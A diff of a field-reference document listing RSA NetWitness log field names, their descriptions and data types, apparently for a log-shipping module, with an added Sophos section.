+*`rsa.identity.ldap_response`*:: + -- +This key is to capture Results from an LDAP search + type: keyword -- -*`rsa.misc.id3`*:: +*`rsa.identity.owner`*:: + -- +This is used to capture username the process or service is running as, the author of the task + type: keyword -- -*`rsa.misc.im_buddyname`*:: +*`rsa.identity.service_account`*:: + -- +This key is a windows specific key, used for capturing name of the account a service (referenced in the event) is running under. Legacy Usage + type: keyword -- -*`rsa.misc.im_croomid`*:: + +*`rsa.email.email_dst`*:: + -- +This key is used to capture the Destination email address only, when the destination context is not clear use email + type: keyword -- -*`rsa.misc.im_croomtype`*:: +*`rsa.email.email_src`*:: + -- +This key is used to capture the source email address only, when the source context is not clear use email + type: keyword -- -*`rsa.misc.im_members`*:: +*`rsa.email.subject`*:: + -- +This key is used to capture the subject string from an Email only. + type: keyword -- -*`rsa.misc.im_username`*:: +*`rsa.email.email`*:: + -- +This key is used to capture a generic email address where the source or destination context is not clear + type: keyword -- -*`rsa.misc.ipkt`*:: +*`rsa.email.trans_from`*:: + -- +Deprecated key defined only in table map. + type: keyword -- -*`rsa.misc.ipscat`*:: +*`rsa.email.trans_to`*:: + -- +Deprecated key defined only in table map. + type: keyword -- -*`rsa.misc.ipspri`*:: + +*`rsa.file.privilege`*:: + -- +Deprecated, use permissions + type: keyword -- -*`rsa.misc.latitude`*:: +*`rsa.file.attachment`*:: + -- +This key captures the attachment file name + type: keyword -- -*`rsa.misc.linenum`*:: +*`rsa.file.filesystem`*:: + -- type: keyword -- -*`rsa.misc.list_name`*:: +*`rsa.file.binary`*:: + -- +Deprecated key defined only in table map. + type: keyword -- -*`rsa.misc.load_data`*:: +*`rsa.file.filename_dst`*:: + -- +This is used to capture name of the file targeted by the action + type: keyword -- -*`rsa.misc.location_floor`*:: +*`rsa.file.filename_src`*:: + -- +This is used to capture name of the parent filename, the file which performed the action + type: keyword -- -*`rsa.misc.location_mark`*:: +*`rsa.file.filename_tmp`*:: + -- type: keyword -- -*`rsa.misc.log_id`*:: +*`rsa.file.directory_dst`*:: + -- +This key is used to capture the directory of the target process or file + type: keyword -- -*`rsa.misc.log_type`*:: +*`rsa.file.directory_src`*:: + -- +This key is used to capture the directory of the source process or file + type: keyword -- -*`rsa.misc.logid`*:: +*`rsa.file.file_entropy`*:: + -- -type: keyword +This is used to capture entropy vale of a file + +type: double -- -*`rsa.misc.logip`*:: +*`rsa.file.file_vendor`*:: + -- +This is used to capture Company name of file located in version_info + type: keyword -- -*`rsa.misc.logname`*:: +*`rsa.file.task_name`*:: + -- +This is used to capture name of the task + type: keyword -- -*`rsa.misc.longitude`*:: + +*`rsa.web.fqdn`*:: + -- +Fully Qualified Domain Names + type: keyword -- -*`rsa.misc.lport`*:: +*`rsa.web.web_cookie`*:: + -- +This key is used to capture the Web cookies specifically. + type: keyword -- -*`rsa.misc.mbug_data`*:: +*`rsa.web.alias_host`*:: + -- type: keyword -- -*`rsa.misc.misc_name`*:: +*`rsa.web.reputation_num`*:: + -- -type: keyword +Reputation Number of an entity. Typically used for Web Domains + +type: double -- -*`rsa.misc.msg_type`*:: +*`rsa.web.web_ref_domain`*:: + -- +Web referer's domain + type: keyword -- -*`rsa.misc.msgid`*:: +*`rsa.web.web_ref_query`*:: + -- +This key captures Web referer's query portion of the URL + type: keyword -- -*`rsa.misc.netsessid`*:: +*`rsa.web.remote_domain`*:: + -- type: keyword -- -*`rsa.misc.num`*:: +*`rsa.web.web_ref_page`*:: + -- +This key captures Web referer's page information + type: keyword -- -*`rsa.misc.number1`*:: +*`rsa.web.web_ref_root`*:: + -- +Web referer's root URL path + type: keyword -- -*`rsa.misc.number2`*:: +*`rsa.web.cn_asn_dst`*:: + -- type: keyword -- -*`rsa.misc.nwwn`*:: +*`rsa.web.cn_rpackets`*:: + -- type: keyword -- -*`rsa.misc.object`*:: +*`rsa.web.urlpage`*:: + -- type: keyword -- -*`rsa.misc.operation`*:: +*`rsa.web.urlroot`*:: + -- type: keyword -- -*`rsa.misc.opkt`*:: +*`rsa.web.p_url`*:: + -- type: keyword -- -*`rsa.misc.orig_from`*:: +*`rsa.web.p_user_agent`*:: + -- type: keyword -- -*`rsa.misc.owner_id`*:: +*`rsa.web.p_web_cookie`*:: + -- type: keyword -- -*`rsa.misc.p_action`*:: +*`rsa.web.p_web_method`*:: + -- type: keyword -- -*`rsa.misc.p_filter`*:: +*`rsa.web.p_web_referer`*:: + -- type: keyword -- -*`rsa.misc.p_group_object`*:: +*`rsa.web.web_extension_tmp`*:: + -- type: keyword -- -*`rsa.misc.p_id`*:: +*`rsa.web.web_page`*:: + -- type: keyword -- -*`rsa.misc.p_msgid1`*:: + +*`rsa.threat.threat_category`*:: + -- +This key captures Threat Name/Threat Category/Categorization of alert + type: keyword -- -*`rsa.misc.p_msgid2`*:: +*`rsa.threat.threat_desc`*:: + -- +This key is used to capture the threat description from the session directly or inferred + type: keyword -- -*`rsa.misc.p_result1`*:: +*`rsa.threat.alert`*:: + -- +This key is used to capture name of the alert + type: keyword -- -*`rsa.misc.password_chg`*:: +*`rsa.threat.threat_source`*:: + -- +This key is used to capture source of the threat + type: keyword -- -*`rsa.misc.password_expire`*:: + +*`rsa.crypto.crypto`*:: + -- +This key is used to capture the Encryption Type or Encryption Key only + type: keyword -- -*`rsa.misc.permgranted`*:: +*`rsa.crypto.cipher_src`*:: + -- +This key is for Source (Client) Cipher + type: keyword -- -*`rsa.misc.permwanted`*:: +*`rsa.crypto.cert_subject`*:: + -- +This key is used to capture the Certificate organization only + type: keyword -- -*`rsa.misc.pgid`*:: +*`rsa.crypto.peer`*:: + -- +This key is for Encryption peer's IP Address + type: keyword -- -*`rsa.misc.policyUUID`*:: +*`rsa.crypto.cipher_size_src`*:: + -- -type: keyword +This key captures Source (Client) Cipher Size + +type: long -- -*`rsa.misc.prog_asp_num`*:: +*`rsa.crypto.ike`*:: + -- +IKE negotiation phase. + type: keyword -- -*`rsa.misc.program`*:: +*`rsa.crypto.scheme`*:: + -- +This key captures the Encryption scheme used + type: keyword -- -*`rsa.misc.real_data`*:: +*`rsa.crypto.peer_id`*:: + -- +This key is for Encryption peer’s identity + type: keyword -- -*`rsa.misc.rec_asp_device`*:: +*`rsa.crypto.sig_type`*:: + -- +This key captures the Signature Type + type: keyword -- -*`rsa.misc.rec_asp_num`*:: +*`rsa.crypto.cert_issuer`*:: + -- type: keyword -- -*`rsa.misc.rec_library`*:: +*`rsa.crypto.cert_host_name`*:: + -- +Deprecated key defined only in table map. + type: keyword -- -*`rsa.misc.recordnum`*:: +*`rsa.crypto.cert_error`*:: + -- +This key captures the Certificate Error String + type: keyword -- -*`rsa.misc.ruid`*:: +*`rsa.crypto.cipher_dst`*:: + -- +This key is for Destination (Server) Cipher + type: keyword -- -*`rsa.misc.sburb`*:: +*`rsa.crypto.cipher_size_dst`*:: + -- -type: keyword +This key captures Destination (Server) Cipher Size + +type: long -- -*`rsa.misc.sdomain_fld`*:: +*`rsa.crypto.ssl_ver_src`*:: + -- +Deprecated, use version + type: keyword -- -*`rsa.misc.sec`*:: +*`rsa.crypto.d_certauth`*:: + -- type: keyword -- -*`rsa.misc.sensorname`*:: +*`rsa.crypto.s_certauth`*:: + -- type: keyword -- -*`rsa.misc.seqnum`*:: +*`rsa.crypto.ike_cookie1`*:: + -- +ID of the negotiation — sent for ISAKMP Phase One + type: keyword -- -*`rsa.misc.session`*:: +*`rsa.crypto.ike_cookie2`*:: + -- +ID of the negotiation — sent for ISAKMP Phase Two + type: keyword -- -*`rsa.misc.sessiontype`*:: +*`rsa.crypto.cert_checksum`*:: + -- type: keyword -- -*`rsa.misc.sigUUID`*:: +*`rsa.crypto.cert_host_cat`*:: + -- +This key is used for the hostname category value of a certificate + type: keyword -- -*`rsa.misc.spi`*:: +*`rsa.crypto.cert_serial`*:: + -- +This key is used to capture the Certificate serial number only + type: keyword -- -*`rsa.misc.srcburb`*:: +*`rsa.crypto.cert_status`*:: + -- +This key captures Certificate validation status + type: keyword -- -*`rsa.misc.srcdom`*:: +*`rsa.crypto.ssl_ver_dst`*:: + -- +Deprecated, use version + type: keyword -- -*`rsa.misc.srcservice`*:: +*`rsa.crypto.cert_keysize`*:: + -- type: keyword -- -*`rsa.misc.state`*:: +*`rsa.crypto.cert_username`*:: + -- type: keyword -- -*`rsa.misc.status1`*:: +*`rsa.crypto.https_insact`*:: + -- type: keyword -- -*`rsa.misc.svcno`*:: +*`rsa.crypto.https_valid`*:: + -- type: keyword -- -*`rsa.misc.system`*:: +*`rsa.crypto.cert_ca`*:: + -- +This key is used to capture the Certificate signing authority only + type: keyword -- -*`rsa.misc.tbdstr1`*:: +*`rsa.crypto.cert_common`*:: + -- +This key is used to capture the Certificate common name only + type: keyword -- -*`rsa.misc.tgtdom`*:: + +*`rsa.wireless.wlan_ssid`*:: + -- +This key is used to capture the ssid of a Wireless Session + type: keyword -- -*`rsa.misc.tgtdomain`*:: +*`rsa.wireless.access_point`*:: + -- +This key is used to capture the access point name. + type: keyword -- -*`rsa.misc.threshold`*:: +*`rsa.wireless.wlan_channel`*:: + -- -type: keyword +This is used to capture the channel names + +type: long -- -*`rsa.misc.type1`*:: +*`rsa.wireless.wlan_name`*:: + -- +This key captures either WLAN number/name + type: keyword -- -*`rsa.misc.udb_class`*:: + +*`rsa.storage.disk_volume`*:: + -- +A unique name assigned to logical units (volumes) within a physical disk + type: keyword -- -*`rsa.misc.url_fld`*:: +*`rsa.storage.lun`*:: + -- +Logical Unit Number.This key is a very useful concept in Storage. + type: keyword -- -*`rsa.misc.user_div`*:: +*`rsa.storage.pwwn`*:: + -- +This uniquely identifies a port on a HBA. + type: keyword -- -*`rsa.misc.userid`*:: + +*`rsa.physical.org_dst`*:: + -- +This is used to capture the destination organization based on the GEOPIP Maxmind database. + type: keyword -- -*`rsa.misc.username_fld`*:: +*`rsa.physical.org_src`*:: + -- +This is used to capture the source organization based on the GEOPIP Maxmind database. + type: keyword -- -*`rsa.misc.utcstamp`*:: + +*`rsa.healthcare.patient_fname`*:: + -- +This key is for First Names only, this is used for Healthcare predominantly to capture Patients information + type: keyword -- -*`rsa.misc.v_instafname`*:: +*`rsa.healthcare.patient_id`*:: + -- +This key captures the unique ID for a patient + type: keyword -- -*`rsa.misc.virt_data`*:: +*`rsa.healthcare.patient_lname`*:: + -- +This key is for Last Names only, this is used for Healthcare predominantly to capture Patients information + type: keyword -- -*`rsa.misc.vpnid`*:: +*`rsa.healthcare.patient_mname`*:: + -- +This key is for Middle Names only, this is used for Healthcare predominantly to capture Patients information + type: keyword -- -*`rsa.misc.autorun_type`*:: + +*`rsa.endpoint.host_state`*:: + -- -This is used to capture Auto Run type +This key is used to capture the current state of the machine, such as blacklisted, infected, firewall disabled and so on type: keyword -- -*`rsa.misc.cc_number`*:: +*`rsa.endpoint.registry_key`*:: + -- -Valid Credit Card Numbers only +This key captures the path to the registry key -type: long +type: keyword -- -*`rsa.misc.content`*:: +*`rsa.endpoint.registry_value`*:: + -- -This key captures the content type from protocol headers +This key captures values or decorators used within a registry entry type: keyword -- -*`rsa.misc.ein_number`*:: -+ --- -Employee Identification Numbers only +[[exported-fields-sophos]] +== sophos fields -type: long +sophos Module --- -*`rsa.misc.found`*:: + +*`network.interface.name`*:: + -- -This is used to capture the results of regex match +Name of the network interface where the traffic has been observed. + type: keyword -- -*`rsa.misc.language`*:: + + +*`rsa.internal.msg`*:: + -- -This is used to capture list of languages the client support and what it prefers +This key is used to capture the raw message that comes into the Log Decoder type: keyword -- -*`rsa.misc.lifetime`*:: +*`rsa.internal.messageid`*:: + -- -This key is used to capture the session lifetime in seconds. - -type: long +type: keyword -- -*`rsa.misc.link`*:: +*`rsa.internal.event_desc`*:: + -- -This key is used to link the sessions together. This key should never be used to parse Meta data from a session (Logs/Packets) Directly, this is a Reserved key in NetWitness - type: keyword -- -*`rsa.misc.match`*:: +*`rsa.internal.message`*:: + -- -This key is for regex match name from search.ini +This key captures the contents of instant messages type: keyword -- -*`rsa.misc.param_dst`*:: +*`rsa.internal.time`*:: + -- -This key captures the command line/launch argument of the target process or file +This is the time at which a session hits a NetWitness Decoder. This key should never be used to parse Meta data from a session (Logs/Packets) Directly, this is a Reserved key in NetWitness. -type: keyword +type: date -- -*`rsa.misc.param_src`*:: +*`rsa.internal.level`*:: + -- -This key captures source parameter +Deprecated key defined only in table map. -type: keyword +type: long -- -*`rsa.misc.search_text`*:: +*`rsa.internal.msg_id`*:: + -- -This key captures the Search Text used +This is the Message ID1 value that identifies the exact log parser definition which parses a particular log session. This key should never be used to parse Meta data from a session (Logs/Packets) Directly, this is a Reserved key in NetWitness type: keyword -- -*`rsa.misc.sig_name`*:: +*`rsa.internal.msg_vid`*:: + -- -This key is used to capture the Signature Name only. +This is the Message ID2 value that identifies the exact log parser definition which parses a particular log session. This key should never be used to parse Meta data from a session (Logs/Packets) Directly, this is a Reserved key in NetWitness type: keyword -- -*`rsa.misc.snmp_value`*:: +*`rsa.internal.data`*:: + -- -SNMP set request value +Deprecated key defined only in table map. type: keyword -- -*`rsa.misc.streams`*:: +*`rsa.internal.obj_server`*:: + -- -This key captures number of streams in session +Deprecated key defined only in table map. -type: long +type: keyword -- - -*`rsa.db.index`*:: +*`rsa.internal.obj_val`*:: + -- -This key captures IndexID of the index. +Deprecated key defined only in table map. type: keyword -- -*`rsa.db.instance`*:: +*`rsa.internal.resource`*:: + -- -This key is used to capture the database server instance name +Deprecated key defined only in table map. type: keyword -- -*`rsa.db.database`*:: +*`rsa.internal.obj_id`*:: + -- -This key is used to capture the name of a database or an instance as seen in a session +Deprecated key defined only in table map. type: keyword -- -*`rsa.db.transact_id`*:: +*`rsa.internal.statement`*:: + -- -This key captures the SQL transantion ID of the current session +Deprecated key defined only in table map. type: keyword -- -*`rsa.db.permissions`*:: +*`rsa.internal.audit_class`*:: + -- -This key captures permission or privilege level assigned to a resource. +Deprecated key defined only in table map. type: keyword -- -*`rsa.db.table_name`*:: +*`rsa.internal.entry`*:: + -- -This key is used to capture the table name +Deprecated key defined only in table map. type: keyword -- -*`rsa.db.db_id`*:: +*`rsa.internal.hcode`*:: + -- -This key is used to capture the unique identifier for a database +Deprecated key defined only in table map. type: keyword -- -*`rsa.db.db_pid`*:: +*`rsa.internal.inode`*:: + -- -This key captures the process id of a connection with database server +Deprecated key defined only in table map. type: long -- -*`rsa.db.lread`*:: +*`rsa.internal.resource_class`*:: + -- -This key is used for the number of logical reads +Deprecated key defined only in table map. -type: long +type: keyword -- -*`rsa.db.lwrite`*:: +*`rsa.internal.dead`*:: + -- -This key is used for the number of logical writes +Deprecated key defined only in table map. type: long -- -*`rsa.db.pread`*:: +*`rsa.internal.feed_desc`*:: + -- -This key is used for the number of physical writes +This is used to capture the description of the feed. This key should never be used to parse Meta data from a session (Logs/Packets) Directly, this is a Reserved key in NetWitness -type: long +type: keyword -- - -*`rsa.network.alias_host`*:: +*`rsa.internal.feed_name`*:: + -- -This key should be used when the source or destination context of a hostname is not clear.Also it captures the Device Hostname. Any Hostname that isnt ad.computer. +This is used to capture the name of the feed. This key should never be used to parse Meta data from a session (Logs/Packets) Directly, this is a Reserved key in NetWitness type: keyword -- -*`rsa.network.domain`*:: +*`rsa.internal.cid`*:: + -- +This is the unique identifier used to identify a NetWitness Concentrator. This key should never be used to parse Meta data from a session (Logs/Packets) Directly, this is a Reserved key in NetWitness + type: keyword -- -*`rsa.network.host_dst`*:: +*`rsa.internal.device_class`*:: + -- -This key should only be used when it’s a Destination Hostname +This is the Classification of the Log Event Source under a predefined fixed set of Event Source Classifications. This key should never be used to parse Meta data from a session (Logs/Packets) Directly, this is a Reserved key in NetWitness type: keyword -- -*`rsa.network.network_service`*:: +*`rsa.internal.device_group`*:: + -- -This is used to capture layer 7 protocols/service names +This key should never be used to parse Meta data from a session (Logs/Packets) Directly, this is a Reserved key in NetWitness type: keyword -- -*`rsa.network.interface`*:: +*`rsa.internal.device_host`*:: + -- -This key should be used when the source or destination context of an interface is not clear +This is the Hostname of the log Event Source sending the logs to NetWitness. This key should never be used to parse Meta data from a session (Logs/Packets) Directly, this is a Reserved key in NetWitness type: keyword -- -*`rsa.network.network_port`*:: +*`rsa.internal.device_ip`*:: + -- -Deprecated, use port. NOTE: There is a type discrepancy as currently used, TM: Int32, INDEX: UInt64 (why neither chose the correct UInt16?!) +This is the IPv4 address of the Log Event Source sending the logs to NetWitness. This key should never be used to parse Meta data from a session (Logs/Packets) Directly, this is a Reserved key in NetWitness -type: long +type: ip -- -*`rsa.network.eth_host`*:: +*`rsa.internal.device_ipv6`*:: + -- -Deprecated, use alias.mac +This is the IPv6 address of the Log Event Source sending the logs to NetWitness. This key should never be used to parse Meta data from a session (Logs/Packets) Directly, this is a Reserved key in NetWitness -type: keyword +type: ip -- -*`rsa.network.sinterface`*:: +*`rsa.internal.device_type`*:: + -- -This key should only be used when it’s a Source Interface +This is the name of the log parser which parsed a given session. This key should never be used to parse Meta data from a session (Logs/Packets) Directly, this is a Reserved key in NetWitness type: keyword -- -*`rsa.network.dinterface`*:: +*`rsa.internal.device_type_id`*:: + -- -This key should only be used when it’s a Destination Interface +Deprecated key defined only in table map. -type: keyword +type: long -- -*`rsa.network.vlan`*:: +*`rsa.internal.did`*:: + -- -This key should only be used to capture the ID of the Virtual LAN +This is the unique identifier used to identify a NetWitness Decoder. This key should never be used to parse Meta data from a session (Logs/Packets) Directly, this is a Reserved key in NetWitness -type: long +type: keyword -- -*`rsa.network.zone_src`*:: +*`rsa.internal.entropy_req`*:: + -- -This key should only be used when it’s a Source Zone. +This key is only used by the Entropy Parser, the Meta Type can be either UInt16 or Float32 based on the configuration -type: keyword +type: long -- -*`rsa.network.zone`*:: +*`rsa.internal.entropy_res`*:: + -- -This key should be used when the source or destination context of a Zone is not clear +This key is only used by the Entropy Parser, the Meta Type can be either UInt16 or Float32 based on the configuration -type: keyword +type: long -- -*`rsa.network.zone_dst`*:: +*`rsa.internal.event_name`*:: + -- -This key should only be used when it’s a Destination Zone. +Deprecated key defined only in table map. type: keyword -- -*`rsa.network.gateway`*:: +*`rsa.internal.feed_category`*:: + -- -This key is used to capture the IP Address of the gateway +This is used to capture the category of the feed. This key should never be used to parse Meta data from a session (Logs/Packets) Directly, this is a Reserved key in NetWitness type: keyword -- -*`rsa.network.icmp_type`*:: +*`rsa.internal.forward_ip`*:: + -- -This key is used to capture the ICMP type only +This key should be used to capture the IPV4 address of a relay system which forwarded the events from the original system to NetWitness. -type: long +type: ip -- -*`rsa.network.mask`*:: +*`rsa.internal.forward_ipv6`*:: + -- -This key is used to capture the device network IPmask. +This key is used to capture the IPV6 address of a relay system which forwarded the events from the original system to NetWitness. This key should never be used to parse Meta data from a session (Logs/Packets) Directly, this is a Reserved key in NetWitness -type: keyword +type: ip -- -*`rsa.network.icmp_code`*:: +*`rsa.internal.header_id`*:: + -- -This key is used to capture the ICMP code only +This is the Header ID value that identifies the exact log parser header definition that parses a particular log session. This key should never be used to parse Meta data from a session (Logs/Packets) Directly, this is a Reserved key in NetWitness -type: long +type: keyword -- -*`rsa.network.protocol_detail`*:: +*`rsa.internal.lc_cid`*:: + -- -This key should be used to capture additional protocol information +This is a unique Identifier of a Log Collector. This key should never be used to parse Meta data from a session (Logs/Packets) Directly, this is a Reserved key in NetWitness type: keyword -- -*`rsa.network.dmask`*:: +*`rsa.internal.lc_ctime`*:: + -- -This key is used for Destionation Device network mask +This is the time at which a log is collected in a NetWitness Log Collector. This key should never be used to parse Meta data from a session (Logs/Packets) Directly, this is a Reserved key in NetWitness -type: keyword +type: date -- -*`rsa.network.port`*:: +*`rsa.internal.mcb_req`*:: + -- -This key should only be used to capture a Network Port when the directionality is not clear +This key is only used by the Entropy Parser, the most common byte request is simply which byte for each side (0 thru 255) was seen the most type: long -- -*`rsa.network.smask`*:: +*`rsa.internal.mcb_res`*:: + -- -This key is used for capturing source Network Mask +This key is only used by the Entropy Parser, the most common byte response is simply which byte for each side (0 thru 255) was seen the most -type: keyword +type: long -- -*`rsa.network.netname`*:: +*`rsa.internal.mcbc_req`*:: + -- -This key is used to capture the network name associated with an IP range. This is configured by the end user. +This key is only used by the Entropy Parser, the most common byte count is the number of times the most common byte (above) was seen in the session streams -type: keyword +type: long -- -*`rsa.network.paddr`*:: +*`rsa.internal.mcbc_res`*:: + -- -Deprecated +This key is only used by the Entropy Parser, the most common byte count is the number of times the most common byte (above) was seen in the session streams -type: ip +type: long -- -*`rsa.network.faddr`*:: +*`rsa.internal.medium`*:: + -- -type: keyword +This key is used to identify if it’s a log/packet session or Layer 2 Encapsulation Type. This key should never be used to parse Meta data from a session (Logs/Packets) Directly, this is a Reserved key in NetWitness. 32 = log, 33 = correlation session, < 32 is packet session + +type: long -- -*`rsa.network.lhost`*:: +*`rsa.internal.node_name`*:: + -- +Deprecated key defined only in table map. + type: keyword -- -*`rsa.network.origin`*:: +*`rsa.internal.nwe_callback_id`*:: + -- +This key denotes that event is endpoint related + type: keyword -- -*`rsa.network.remote_domain_id`*:: +*`rsa.internal.parse_error`*:: + -- +This is a special key that stores any Meta key validation error found while parsing a log session. This key should never be used to parse Meta data from a session (Logs/Packets) Directly, this is a Reserved key in NetWitness + type: keyword -- -*`rsa.network.addr`*:: +*`rsa.internal.payload_req`*:: + -- -type: keyword +This key is only used by the Entropy Parser, the payload size metrics are the payload sizes of each session side at the time of parsing. However, in order to keep + +type: long -- -*`rsa.network.dns_a_record`*:: +*`rsa.internal.payload_res`*:: + -- -type: keyword +This key is only used by the Entropy Parser, the payload size metrics are the payload sizes of each session side at the time of parsing. However, in order to keep + +type: long -- -*`rsa.network.dns_ptr_record`*:: +*`rsa.internal.process_vid_dst`*:: + -- +Endpoint generates and uses a unique virtual ID to identify any similar group of process. This ID represents the target process. + type: keyword -- -*`rsa.network.fhost`*:: +*`rsa.internal.process_vid_src`*:: + -- +Endpoint generates and uses a unique virtual ID to identify any similar group of process. This ID represents the source process. + type: keyword -- -*`rsa.network.fport`*:: +*`rsa.internal.rid`*:: + -- -type: keyword +This is a special ID of the Remote Session created by NetWitness Decoder. This key should never be used to parse Meta data from a session (Logs/Packets) Directly, this is a Reserved key in NetWitness + +type: long -- -*`rsa.network.laddr`*:: +*`rsa.internal.session_split`*:: + -- +This key should never be used to parse Meta data from a session (Logs/Packets) Directly, this is a Reserved key in NetWitness + type: keyword -- -*`rsa.network.linterface`*:: +*`rsa.internal.site`*:: + -- +Deprecated key defined only in table map. + type: keyword -- -*`rsa.network.phost`*:: +*`rsa.internal.size`*:: + -- -type: keyword +This is the size of the session as seen by the NetWitness Decoder. This key should never be used to parse Meta data from a session (Logs/Packets) Directly, this is a Reserved key in NetWitness + +type: long -- -*`rsa.network.ad_computer_dst`*:: +*`rsa.internal.sourcefile`*:: + -- -Deprecated, use host.dst +This is the name of the log file or PCAPs that can be imported into NetWitness. This key should never be used to parse Meta data from a session (Logs/Packets) Directly, this is a Reserved key in NetWitness type: keyword -- -*`rsa.network.eth_type`*:: +*`rsa.internal.ubc_req`*:: + -- -This key is used to capture Ethernet Type, Used for Layer 3 Protocols Only +This key is only used by the Entropy Parser, Unique byte count is the number of unique bytes seen in each stream. 256 would mean all byte values of 0 thru 255 were seen at least once type: long -- -*`rsa.network.ip_proto`*:: +*`rsa.internal.ubc_res`*:: + -- -This key should be used to capture the Protocol number, all the protocol nubers are converted into string in UI +This key is only used by the Entropy Parser, Unique byte count is the number of unique bytes seen in each stream. 256 would mean all byte values of 0 thru 255 were seen at least once type: long -- -*`rsa.network.dns_cname_record`*:: +*`rsa.internal.word`*:: + -- +This is used by the Word Parsing technology to capture the first 5 character of every word in an unparsed log + type: keyword -- -*`rsa.network.dns_id`*:: + +*`rsa.time.event_time`*:: + -- -type: keyword +This key is used to capture the time mentioned in a raw session that represents the actual time an event occured in a standard normalized form + +type: date -- -*`rsa.network.dns_opcode`*:: +*`rsa.time.duration_time`*:: + -- -type: keyword +This key is used to capture the normalized duration/lifetime in seconds. + +type: double -- -*`rsa.network.dns_resp`*:: +*`rsa.time.event_time_str`*:: + -- +This key is used to capture the incomplete time mentioned in a session as a string + type: keyword -- -*`rsa.network.dns_type`*:: +*`rsa.time.starttime`*:: + -- -type: keyword +This key is used to capture the Start time mentioned in a session in a standard form + +type: date -- -*`rsa.network.domain1`*:: +*`rsa.time.month`*:: + -- type: keyword -- -*`rsa.network.host_type`*:: +*`rsa.time.day`*:: + -- type: keyword -- -*`rsa.network.packet_length`*:: +*`rsa.time.endtime`*:: + -- -type: keyword +This key is used to capture the End time mentioned in a session in a standard form + +type: date -- -*`rsa.network.host_orig`*:: +*`rsa.time.timezone`*:: + -- -This is used to capture the original hostname in case of a Forwarding Agent or a Proxy in between. +This key is used to capture the timezone of the Event Time type: keyword -- -*`rsa.network.rpayload`*:: +*`rsa.time.duration_str`*:: + -- -This key is used to capture the total number of payload bytes seen in the retransmitted packets. +A text string version of the duration type: keyword -- -*`rsa.network.vlan_name`*:: +*`rsa.time.date`*:: + -- -This key should only be used to capture the name of the Virtual LAN - type: keyword -- - -*`rsa.investigations.ec_activity`*:: +*`rsa.time.year`*:: + -- -This key captures the particular event activity(Ex:Logoff) - type: keyword -- -*`rsa.investigations.ec_theme`*:: +*`rsa.time.recorded_time`*:: + -- -This key captures the Theme of a particular Event(Ex:Authentication) +The event time as recorded by the system the event is collected from. The usage scenario is a multi-tier application where the management layer of the system records it's own timestamp at the time of collection from its child nodes. Must be in timestamp format. -type: keyword +type: date -- -*`rsa.investigations.ec_subject`*:: +*`rsa.time.datetime`*:: + -- -This key captures the Subject of a particular Event(Ex:User) - type: keyword -- -*`rsa.investigations.ec_outcome`*:: +*`rsa.time.effective_time`*:: + -- -This key captures the outcome of a particular Event(Ex:Success) +This key is the effective time referenced by an individual event in a Standard Timestamp format -type: keyword +type: date -- -*`rsa.investigations.event_cat`*:: +*`rsa.time.expire_time`*:: + -- -This key captures the Event category number +This key is the timestamp that explicitly refers to an expiration. -type: long +type: date -- -*`rsa.investigations.event_cat_name`*:: +*`rsa.time.process_time`*:: + -- -This key captures the event category name corresponding to the event cat code +Deprecated, use duration.time type: keyword -- -*`rsa.investigations.event_vcat`*:: +*`rsa.time.hour`*:: + -- -This is a vendor supplied category. This should be used in situations where the vendor has adopted their own event_category taxonomy. - type: keyword -- -*`rsa.investigations.analysis_file`*:: +*`rsa.time.min`*:: + -- -This is used to capture all indicators used in a File Analysis. This key should be used to capture an analysis of a file - type: keyword -- -*`rsa.investigations.analysis_service`*:: +*`rsa.time.timestamp`*:: + -- -This is used to capture all indicators used in a Service Analysis. This key should be used to capture an analysis of a service - type: keyword -- -*`rsa.investigations.analysis_session`*:: +*`rsa.time.event_queue_time`*:: + -- -This is used to capture all indicators used for a Session Analysis. This key should be used to capture an analysis of a session +This key is the Time that the event was queued. -type: keyword +type: date -- -*`rsa.investigations.boc`*:: +*`rsa.time.p_time1`*:: + -- -This is used to capture behaviour of compromise - type: keyword -- -*`rsa.investigations.eoc`*:: +*`rsa.time.tzone`*:: + -- -This is used to capture Enablers of Compromise - type: keyword -- -*`rsa.investigations.inv_category`*:: +*`rsa.time.eventtime`*:: + -- -This used to capture investigation category - type: keyword -- -*`rsa.investigations.inv_context`*:: +*`rsa.time.gmtdate`*:: + -- -This used to capture investigation context - type: keyword -- -*`rsa.investigations.ioc`*:: +*`rsa.time.gmttime`*:: + -- -This is key capture indicator of compromise - type: keyword -- - -*`rsa.counters.dclass_c1`*:: +*`rsa.time.p_date`*:: + -- -This is a generic counter key that should be used with the label dclass.c1.str only - -type: long +type: keyword -- -*`rsa.counters.dclass_c2`*:: +*`rsa.time.p_month`*:: + -- -This is a generic counter key that should be used with the label dclass.c2.str only - -type: long +type: keyword -- -*`rsa.counters.event_counter`*:: +*`rsa.time.p_time`*:: + -- -This is used to capture the number of times an event repeated - -type: long +type: keyword -- -*`rsa.counters.dclass_r1`*:: +*`rsa.time.p_time2`*:: + -- -This is a generic ratio key that should be used with the label dclass.r1.str only - type: keyword -- -*`rsa.counters.dclass_c3`*:: +*`rsa.time.p_year`*:: + -- -This is a generic counter key that should be used with the label dclass.c3.str only - -type: long +type: keyword -- -*`rsa.counters.dclass_c1_str`*:: +*`rsa.time.expire_time_str`*:: + -- -This is a generic counter string key that should be used with the label dclass.c1 only +This key is used to capture incomplete timestamp that explicitly refers to an expiration. type: keyword -- -*`rsa.counters.dclass_c2_str`*:: +*`rsa.time.stamp`*:: + -- -This is a generic counter string key that should be used with the label dclass.c2 only +Deprecated key defined only in table map. -type: keyword +type: date -- -*`rsa.counters.dclass_r1_str`*:: + +*`rsa.misc.action`*:: + -- -This is a generic ratio string key that should be used with the label dclass.r1 only - type: keyword -- -*`rsa.counters.dclass_r2`*:: +*`rsa.misc.result`*:: + -- -This is a generic ratio key that should be used with the label dclass.r2.str only +This key is used to capture the outcome/result string value of an action in a session. type: keyword -- -*`rsa.counters.dclass_c3_str`*:: +*`rsa.misc.severity`*:: + -- -This is a generic counter string key that should be used with the label dclass.c3 only +This key is used to capture the severity given the session type: keyword -- -*`rsa.counters.dclass_r3`*:: +*`rsa.misc.event_type`*:: + -- -This is a generic ratio key that should be used with the label dclass.r3.str only +This key captures the event category type as specified by the event source. type: keyword -- -*`rsa.counters.dclass_r2_str`*:: +*`rsa.misc.reference_id`*:: + -- -This is a generic ratio string key that should be used with the label dclass.r2 only +This key is used to capture an event id from the session directly type: keyword -- -*`rsa.counters.dclass_r3_str`*:: +*`rsa.misc.version`*:: + -- -This is a generic ratio string key that should be used with the label dclass.r3 only +This key captures Version of the application or OS which is generating the event. type: keyword -- - -*`rsa.identity.auth_method`*:: +*`rsa.misc.disposition`*:: + -- -This key is used to capture authentication methods used only +This key captures the The end state of an action. type: keyword -- 